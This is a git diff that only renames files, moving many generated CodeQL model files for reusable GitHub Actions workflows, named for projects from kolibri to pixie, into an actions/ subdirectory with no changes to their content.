diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml
